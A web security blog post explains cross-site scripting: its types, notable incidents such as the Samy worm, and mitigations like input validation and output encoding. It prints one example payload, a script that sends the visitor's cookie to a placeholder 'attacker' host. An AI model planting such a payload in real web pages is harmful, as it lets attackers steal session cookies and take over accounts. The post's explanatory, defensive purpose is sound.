Cross Site Scripting XSS - Astra Security

Cross-Site Scripting (XSS) attacks are stated as one of the most rampant occurring yet easily fixable injection attack faced by e-commerce businesses and a variety of other web applications. From targeting applications built on archaic web technologies to newer ones using rich, client-side UIs, XSS has plagued them all. However, it is imperative to realize that vulnerabilities posing as a potential cause for a XSS attack can be easily detected and fixed timely.

How does a Cross-site scripting attack occur?

A cross site scripting (XSS) attack occurs when

  1. A web application requests for input data through an unreliable source
  2. The dynamic content inputted via the web request is used without being corroborated for lack of malicious content.

A simple example of such input data is when we submit our name, e-mail ID, username-password or any input in a form. XSS Vulnerability Whys & How's Each of the above entered inputs can be manipulated if the underlying code doesn’t properly validate the inputs. An attacker makes use of this inability to inject malicious content, usually in the form of a Javascript code, HTML or any form of code executable by the browser. The end user has no way of suspecting the unreliable script and will end up executing it. Once injected, the script gains access to any cookies, session tokens or sensitive info used by this site.

An XSS attack is of 3 types:

  1. DOM Based Attack: Caused by malicious injection of code from client side. The injected code can be Javascript, Flash, Visual Basic etc.
  2. Persistent XSS Attack: Caused when payload is stored on server side and gets retrieved when there is a user request to a page
  3. Non-Persistent XSS Attack: Caused when payload is reflected back to the user by opening a link to a vulnerable website with a crafted input.

XSS Causes and How to Prevent

Anatomy of a Cross-site scripting (XSS) attack

How Attackers Exploit XSS?

Generally, an attacker uses a XSS vulnerability to extract session cookies of the end user which finally enables the attacker to access the account of the user. An example of the above scenario is:
  •  The website you access possesses a comment field.
  • The attacker posts the following payload in the comment section.
 <script>
window.location='http://attacker/?cookie='+document.cookie
</script>
  • As soon as any legitimate users opens the comment box to see the following comment, HTML parses this script.
  • When HTML parsing is done by the browser, user’s cookie is sent to attacker on his server.
 This simple vulnerability, if existing in your web application, can have very serious implications. Another common XSS exploitation is when attackers use your application for drive-by downloads, where-in the attacker causes an end user to download malware without their knowledge, by clicking on legitimate looking links.

Notorious Cases of Cross-Site Scripting Attacks

XSS attacks mostly occur for financial gains, a notable one is the past attack against e-commerce giant eBay. The hackers injected a malicious Javascript code into several listings for cheap iphones, which in turn redirected users to a fake login page created to compromise user credentials.

Apart from e-commerce sites, several social media sites have been subject to such infamous attacks. Twitter was targeted with one such XSS worm that led to malicious links getting lodged on a website named StalkDaily. Another well- known XSS attack was the MySpace attack by the Samy worm – a benign virus which altered the profile page of MySpace users and sent random friend requests.

Precautions to Mitigate XSS Attacks

Preventing a XSS attack doesn’t imply disabling users to input their payloads, rather take measures to stop it from being parsed as HTML in the browser. That being said, here are few methodologies which are used to prevent a XSS attack. 
  1. Input Validation

    To prevent XSS, white-list most input to alphanumeric or in some cases, special characters. This will reduce surface attack and minimize the potential for bugs.

  2. Use of secure DOM elements

    Often, unsafe handling of DOM elements (document object model) lead to XSS attacks in even rich client UIs. For example, using the innerHTML attribute renders the user input as XSS with Javascript events. In this case, the safe alternative would be to use contentText or innerText.

  3. JavaScript Escaping

    Escaping single quotes can prevent injection within Javascript. HTML encoding that uses single quotes with ‘ should be used to prevent the injection issue

  4. Output Encoding

    Output encoding works wonders when it comes to neutralizing maximum XSS payloads. This method works to mitigate server side injection attacks. While HTML encoding is a rather common method, URL encoding can help obliterate any injections of markup in links and redirects.

Was this post helpful?



Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Bhagyeshwari Chauhan

An engineering grad and a technical writer, Bhagyeshwari blogs about web security, futuristic tech and space science.

5 Comments

  1. 5 Magento Extensions that could be the cause of your store being hacked - Astra Web Security Blog - Reply

    […] cross site scripting (XSS) vulnerability came to light in the Magento Affiliate Plus extension rendering more than 7000+ stores vulnerable […]

  2. How to Prevent Cross-site Scripting (XSS) in Opencart 1.5.x, 2.x & 3.x - Astra Web Security Blog - Reply

    […] Cross-site Scripting (XSS) is a popular code injection vulnerability that allows a hacker to execute malicious JavaScript code into another user’s web browser. It’s risky because malicious JavaScript code can have drastic consequences like credit card hijacking, user information theft etc. […]

  3. 9 Essential Security Tips to Protect Your Website & App from Hackers this BlackFriday-CyberMonday - Astra Web Security Blog - Reply

    […] Not Trust Those Inputs: Vulnerabilities like SQL Injection and Cross Site Scripting are one of the most exploited on web apps. Be it WordPress, Magento or OpenCart all have had cases […]

  4. Detailed Guide on Website Malware Attacks: Causes, Consequences & Steps to Fix - Astra Web Security Blog - Reply

    […] add evil code. This is an easy way to get entry inside the website without doing much. Attacks like XSS and SQL injection are direct consequences of the lack of input sanitization. Recently, Joomla  […]

  5. The Ultimate Drupal Security Practices and Malware Removal Guide - Astra Web Security - Reply

    […] with its sites till now. The vulnerability of its sites getting infected lies mainly with the cross-site inscription(XSS). Still, it must not be forgotten that no site is completely hacked proof. Thus, this article […]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close